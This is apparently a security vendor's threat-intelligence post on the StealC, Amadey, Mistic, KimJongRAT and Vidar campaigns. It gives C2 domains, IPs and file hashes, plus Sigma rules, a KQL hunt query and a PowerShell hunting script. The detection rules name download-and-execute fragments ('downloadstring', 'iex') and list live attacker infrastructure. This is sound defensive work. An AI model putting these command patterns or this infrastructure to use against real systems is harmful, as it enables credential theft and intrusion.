Recent OTX pulses indicate a coordinated surge in cybercrime activity focused on credential harvesting and initial access brokering. The landscape is dominated by the deployment of Infostealer-as-a-Service (MaaS) families, specifically StealC and Amadey, which are silently harvesting browser data, cookies, and session tokens to facilitate enterprise breaches. While Operation Endgame has disrupted a significant portion of the Amadey and Stealc C2 infrastructure (seizing ~50 domains and 200 IPs), threat actors are actively pivoting.
Simultaneously, a new stealthy backdoor, Mistic, has been linked to the access broker Woodgnat, which supplies access to ransomware operations like Qilin and Black Basta. In a separate geopolitical thread, Kimsuky continues to evolve KimJongRAT using legitimate infrastructure like GitHub for delivery, while GhostShell targets Ukraine's UAV supply chain using Vidar stealer. The collective objective across these campaigns is the theft of identity credentials to enable downstream financial fraud or ransomware deployment.
Threat Actor / Malware Profile
1. StealC & Amadey (MaaS Infostealers)
- Distribution: Phishing attachments, malicious cracks/keygens, and secondary payload delivery via other loaders.
- Payload Behavior: StealC (C++) targets browsers, crypto wallets, and 2FA extensions. Amadey acts as a botnet agent and downloader.
- C2 Communication: HTTP/HTTPS POST requests to specific domains (e.g.,
microsoft-telemetry.at) often utilizing spoofed telemetry user-agents. - Persistence: Scheduled tasks or Registry Run keys.
2. Mistic Backdoor & Woodgnat
- Actor: Woodgnat (Initial Access Broker).
- Behavior: Uses DLL sideloading to execute the Mistic backdoor. It serves as a persistent foothold, often leading to ransomware (Qilin, Interlock).
- Associated Tools: ModeloRAT, D3F@ck Loader.
3. KimJongRAT (Kimsuky)
- Distribution: Phishing emails with shortened URLs pointing to GitHub Releases hosting malicious ZIPs.
- Behavior: Combines info-stealing with Remote Access Trojan (RAT) capabilities.
- Targeting: Initially observed targeting Japan, but infrastructure is globally accessible.
4. Vidar Stealer (GhostShell)
- Target: Ukraine Defense sector / UAV supply chain.
- Method: Malicious archives impersonating legitimate entities (Besomar).
IOC Analysis
The provided pulses yield high-fidelity indicators across multiple categories:
-
Network Infrastructure (C2):
- Domains:
microsoft-telemetry.at,svclsc.com,googleoba.servequake.com,mail.authorized-logins.net. - IPs:
176.124.199.207,176.111.174.140,104.200.67.46. - Operationalization: SOC teams should immediately block these IPs/domains on perimeter firewalls and proxies. The domains
microsoft-telemetry.atandsvclsc.comare clear examples of domain spoofing intended to bypass network monitoring.
- Domains:
-
File Hashes (Payloads):
- SHA256:
8cef760d11d24fc2e9bbd9f770dca5105854f7ece3b0e6948d7c8b7fdd1765ea(StealC),3f797a639bc855bc6d5471f327924b62d10900ddec49b970eca6604142bbb4be(Mistic). - Operationalization: Load these into EDR solutions for immediate quarantine. Use these hashes to hunt for historical detections on endpoints.
- SHA256:
Detection Engineering
Detection rules focus on the C2 infrastructure identified in the Operation Endgame takedown and the specific delivery mechanisms of Mistic/KimJongRAT.
YAML
title: Potential StealC or Amadey C2 Communication - OTX Pulse
id: 8b2e5c17-6a12-4b9c-9f1d-1a3b4c5d6e7f
description: Detects network connections to known StealC and Amadey C2 infrastructure and associated domains identified in Operation Endgame pulses.
author: Security Arsenal
date: 2026/06/26
modified: 2026/06/26
tags:
- attack.command_and_control
- attack.t1071.001
logsource:
category: network_connection
product: windows
detection:
selection:
Initiated: 'true'
DestinationHostname|contains:
- 'microsoft-telemetry.at'
- 'svclsc.com'
- 'goodpanelforgoodjob.com'
- 'googleoba.servequake.com'
- 'corpsecs.com'
- 'authorized-logins.net'
- 'overlapsnowbound.com'
selection_ips:
DestinationIp|startswith:
- '176.124.199.207'
- '176.111.174.140'
- '62.60.226.159'
- '94.154.35.25'
- '64.188.91.237'
- '104.200.67.46'
condition: 1 of selection*
falsepositives:
- Legitimate administrative access (unlikely for these specific domains)
level: high
---
title: Suspicious File Execution - Mistic Backdoor Component
id: a1b2c3d4-5678-90ab-cdef-1234567890ab
description: Detects execution of files with hashes associated with the Mistic backdoor and Woodgnat activity.
author: Security Arsenal
date: 2026/06/26
tags:
- attack.execution
- attack.t1204
logsource:
category: process_creation
product: windows
detection:
selection_hashes:
Hashes|contains:
- '3f797a639bc855bc6d5471f327924b62d10900ddec49b970eca6604142bbb4be'
selection_generic:
Image|endswith:
- '\rundll32.exe'
- '\regsvr32.exe'
CommandLine|contains:
- '.dll'
- 'http://'
condition: 1 of selection*
falsepositives:
- Rare; legitimate DLL loading should not involve these specific hashes
level: critical
---
title: Credential Stealer Process Pattern - StealC/RedLine/Vidar
id: f1e2d3c4-b5a6-7890-cdef-123456789012
description: Detects typical process injection patterns used by infostealers like StealC, RedLine, and Vidar observed in recent pulses.
author: Security Arsenal
date: 2026/06/26
tags:
- attack.defense_evasion
- attack.t1055.001
logsource:
category: process_creation
product: windows
detection:
selection_injection:
ParentImage|endswith:
- '\explorer.exe'
- '\chrome.exe'
- '\firefox.exe'
Image|endswith:
- '\powershell.exe'
- '\cmd.exe'
CommandLine|contains:
- 'downloadstring'
- 'iex'
- 'invoke-expression'
condition: selection_injection
falsepositives:
- Administrator scripting
level: medium
kql
// Hunt for StealC/Amadey/KimJongRAT C2 Traffic and File Hashes
// Unified query for DeviceNetworkEvents and DeviceFileEvents
let IOCs_Domains = dynamic(['microsoft-telemetry.at', 'svclsc.com', 'googleoba.servequake.com', 'mail.authorized-logins.net', 'mueleer.com', 'authorized-logins.net']);
let IOCs_IPs = dynamic(['176.124.199.207', '176.111.174.140', '62.60.226.159', '94.154.35.25', '64.188.91.237', '104.200.67.46']);
let IOCs_Hashes = dynamic(['8cef760d11d24fc2e9bbd9f770dca5105854f7ece3b0e6948d7c8b7fdd1765ea', '3f797a639bc855bc6d5471f327924b62d10900ddec49b970eca6604142bbb4be']);
NetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any (IOCs_Domains) or RemoteIP has_any (IOCs_IPs)
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP, RemotePort
| union (
DeviceFileEvents
| where Timestamp > ago(30d)
| where SHA256 has_any (IOCs_Hashes)
| project Timestamp, DeviceName, FileName, FolderPath, SHA256, InitiatingProcessAccountName
)
powershell
# PowerShell Hunt Script: StealC, Amadey, Mistic Artifacts
# Requires Admin Privileges
Write-Host "[+] Hunting for StealC/Amadey/Mistic Artifacts..." -ForegroundColor Cyan
# 1. Check Hosts File for Telemetry Spoofing (Common in Amadey/StealC)
$hostsPath = "$env:SystemRoot\System32\drivers\etc\hosts"
$maliciousDomains = @('microsoft-telemetry.at', 'svclsc.com')
$hostsContent = Get-Content $hostsPath
$foundHosts = @()
foreach ($domain in $maliciousDomains) {
if ($hostsContent -match $domain) {
$foundHosts += $domain
Write-Host "[!] ALERT: $domain found in hosts file! Possible DNS poisoning." -ForegroundColor Red
}
}
# 2. Check for Suspicious Scheduled Tasks (Persistence)
Write-Host "[+] Checking Scheduled Tasks for Suspicious Actions..." -ForegroundColor Cyan
$suspiciousTasks = Get-ScheduledTask | Where-Object {
$_.Actions.Execute -like "*powershell*" -or
$_.Actions.Execute -like "*cmd*" -or
$_.Actions.Arguments -match "http" -or
$_.TaskName -match "Update" -and $_.Author -eq ""
}
if ($suspiciousTasks) {
Write-Host "[!] Found suspicious scheduled tasks:" -ForegroundColor Yellow
$suspiciousTasks | Select-Object TaskName, Author, @{Name="Action";Expression={$_.Actions.Execute}} | Format-Table
} else {
Write-Host "[-] No obviously suspicious scheduled tasks found." -ForegroundColor Green
}
# 3. Network Connection Check (Active C2)
Write-Host "[+] Checking Active Network Connections for C2 IPs..." -ForegroundColor Cyan
$maliciousIPs = @('176.124.199.207', '176.111.174.140', '104.200.67.46')
$connections = Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue
foreach ($ip in $maliciousIPs) {
$hit = $connections | Where-Object { $_.RemoteAddress -eq $ip }
if ($hit) {
Write-Host "[!] CRITICAL: Active connection to malicious IP $ip detected (PID: $($hit.OwningProcess))" -ForegroundColor Red
Get-Process -Id $hit.OwningProcess | Select-Object ProcessName, Path
}
}
Write-Host "[+] Hunt Complete." -ForegroundColor Cyan
Response Priorities
-
Immediate (0-4h):
- Block IOCs: Implement blocks on all listed domains and IP addresses at the firewall and proxy level.
- Isolate Hosts: Identify and isolate any endpoints with positive matches for the provided file hashes.
- Hunt Persistence: Search for Scheduled Tasks or Registry Run keys referencing the spoofed
microsoft-telemetry.atdomain.
-
Within 24h:
- Credential Reset: If StealC, Amadey, or Vidar infection is confirmed, force a password reset for all user sessions active on the compromised machine within the window of infection.
- Session Token Revocation: Invalidate session tokens and cookies for corporate SaaS applications accessed from the infected host.
-
Within 1 Week:
- Architecture Hardening: Review policies regarding the execution of code from GitHub (mitigates KimJongRAT vector) and restrict the creation of child processes by Office applications.
- Supply Chain Audit: Given the GhostShell activity, audit third-party vendors, specifically those in the defense or manufacturing sector, for unusual data exchange or email traffic.
Related Resources
Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub
darkwebotx-pulsedarkweb-credentialsinfostealerstealcamadeyransomware-accessmistic-backdoor
Is your security operations ready?
Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.